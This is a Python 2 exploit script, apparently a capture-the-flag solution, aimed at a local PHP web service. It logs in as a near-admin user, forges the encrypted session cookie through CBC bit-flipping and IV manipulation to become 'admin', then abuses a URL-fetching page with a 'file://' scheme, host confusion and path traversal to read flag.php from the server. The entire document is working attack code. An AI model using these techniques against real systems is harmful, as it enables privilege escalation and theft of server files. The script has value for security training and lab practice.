1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
|
import urllib
import requests
import re
import base64
url = "http://0.0.0.0:20001/"
data = {
"username":"1dmin",
"password":"1231111",
"submit":"Login"
}
r = requests.post(url=url,data=data)
list = r.headers['Set-Cookie'].split(", ")
iv = urllib.unquote(list[1][4:])
cipher = base64.b64decode(urllib.unquote(list[2][10:]))
phpsessid = list[0].split(";")[0][10:]
block = []
for i in range(0,len(cipher),16):
block.append(cipher[i:i+16])
replace = chr(ord(block[0][9]) ^ ord('1') ^ ord('a'))
block[0] = block[0][:9]+replace+block[0][10:]
iv = base64.b64decode(iv)
cipher_new = ""
for i in range(0,len(block)):
cipher_new += block[i]
cookie={
"PHPSESSID":phpsessid,
"user_info":urllib.quote(base64.b64encode(cipher_new)),
"key":urllib.quote(base64.b64encode(iv))
}
s = requests.get(url=url,cookies=cookie)
res_tr = r"<p>.*?</p>"
m_tr = re.findall(res_tr,s.content)
base = m_tr[0][3:-4]
plain = base64.b64decode(base)[:16]
want = 'a:2:{s:8:"userna'
first_16 = ''
for i in range(16):
first_16 += chr(ord(plain[i]) ^ ord(iv[i]) ^ ord(want[i]))
newiv = first_16
cookie={
"PHPSESSID":phpsessid,
"user_info":urllib.quote(base64.b64encode(cipher_new)),
"key":urllib.quote(base64.b64encode(newiv))
}
k = requests.get(url=url,cookies=cookie)
url2 = url+'mmman4g.php?url=FILe://@127.0.0.1:80@www.harmonyos.com/.//../../var/www/html/flag.php'
cookie = {
"PHPSESSID":phpsessid
}
r = requests.get(url=url2,cookies = cookie)
res_tr = r"'.*?}'"
m_tr = re.findall(res_tr,r.content)
print 'admin PHPSESSID:',phpsessid
print m_tr[0][1:-1]
|